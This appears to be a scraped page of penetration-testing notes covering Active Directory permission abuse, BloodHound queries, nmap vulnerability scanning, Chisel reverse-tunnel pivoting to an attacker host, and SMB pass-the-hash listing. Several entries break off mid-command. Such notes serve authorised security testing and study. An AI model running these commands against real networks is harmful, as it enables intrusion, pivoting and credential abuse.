Archive

Abusing Active Directory (AD) ACLs/ACEs

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

Some of the Active Directory object types and permissions of interest to attackers:

GenericAll – full permissions on the object (add users to a group or reset users' passwords)
GenericWrite – update the object's attributes

BloodHound Cypher Cheatsheet

https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Mark all owned users with a Cypher query. The owned users are defined in the list:

WITH ['usuario1','usuario2'] as ownedlist
UNWIND ownedlist as owned
WITH owned
MATCH (m:User {samaccountname:owned})
SET m.owned=TRUE
RETURN m

The Cypher query can also be run as a single line: WITH

Using NMAP to scan for vulnerabilities

https://geekflare.com/nmap-vulnerability-scan/

Nmap-vulners
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
nmap -sV --script vulners [--script-args mincvss=<score>] <target>
nmap -sV --script nmap-vulners/ -p80,223 <target>
Example: sudo nmap -sU -sV --script vulners -p U:53 <target>

Nmap – vuln
nmap -sV --script vuln <target>

Nmap-vulscan
cd /usr/share/nmap/scripts/
git clone https://github.com/scipag/vulscan.git scipag_vulscan
ln -s "$(pwd)/scipag_vulscan" /usr/share/nmap/scripts/vulscan
cd vulscan/utilities/updater/
chmod +x

Pivoting Techniques

https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding
https://michmich.eu/Cheatsheets/internal/07-pivoting/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md

Chisel
You can download it from the releases page of https://github.com/jpillora/chisel
You need to use the same version for client and server.

socks
./chisel server -p 8080 --reverse #Server — Attacker
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client —

Pentesting SMB

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
https://github.com/ShawnDEvans/smbmap

To perform a recursive listing use -R; with -p, the "NT:LM" hash can be supplied instead of the password.